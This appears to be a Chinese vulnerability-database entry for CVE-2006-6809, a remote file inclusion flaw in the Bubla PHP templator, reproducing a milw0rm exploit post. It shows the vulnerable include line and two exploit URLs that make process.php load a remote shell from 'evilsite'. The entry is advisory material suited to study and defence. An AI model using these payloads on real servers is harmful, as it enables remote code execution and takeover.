Vladimir Menshakov buratinable templator 'Process.PHP'多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111886 漏洞类型 输入验证
发布时间 2006-12-27 更新时间 2007-01-02
CVE编号 CVE-2006-6809 CNNVD-ID CNNVD-200612-605
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3026
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-605
|漏洞详情
VladimirMenshakovburatinabletemplator(bubla)1.0.0rc2及更早版本中的process.php存在多个PHP远程文件包含漏洞,远程攻击者可以通过在(1)bu_dir或(2)bu_config[dir]参数内的URL来执行任意PHP代码。
|漏洞EXP
**********************************************************************************************************
                                              DeltasecurityTEAM
                                              WwW.Deltasecurity.iR
**********************************************************************************************************

* Portal Name = Bubla <= 1.0.0rc2

* Class = Remote File Inclusion

* Risk = High (Remote File Execution)

* Download = http://download.sourceforge.net/pub/sourceforge/b/bu/bubla/bubla-1.0.0rc1.tar.gz

* Discoverd By = DeltahackingTEAM

* User In Delta Team = Davood_Cracker

* Conatact = Davood_cracker@yahoo.com

* 128 Bit Security Server= www.takserver.ir

* Just Delta Hacking Security TEAM *
--------------------------------------------------------------------------------------------
Vulnerable code in process.php

require_once($bu_dir."/bu_l2.php");

--------------------------------------------------------------------------------------------

- Exploit:

1.0.0 RC1 http://localhost/[PATH]/bu/process.php?bu_dir=http://evilsite/Shell.php?
1.0.0 RC2 http://localhost/[PATH]/bu/process.php?bu_config[dir]=http://evilsite/Shell.php?

--------------------------------------------------------------------------------------------

Gr33tz : Dr.Trojan , Hiv++ , D_7j , Vpc

SP TNX : Dr.Pantagon

**********************************************************************************************************

# milw0rm.com [2006-12-27]
|参考资料

来源:BID
名称:21793
链接:http://www.securityfocus.com/bid/21793
来源:MILW0RM
名称:3026
链接:http://www.milw0rm.com/exploits/3026
来源:XF
名称:bubla-process-file-include(31135)
链接:http://xforce.iss.net/xforce/xfdb/31135
来源:VUPEN
名称:ADV-2006-5195
链接:http://www.frsirt.com/english/advisories/2006/5195
来源:MILW0RM
名称:3026
链接:http://milw0rm.com/exploits/3026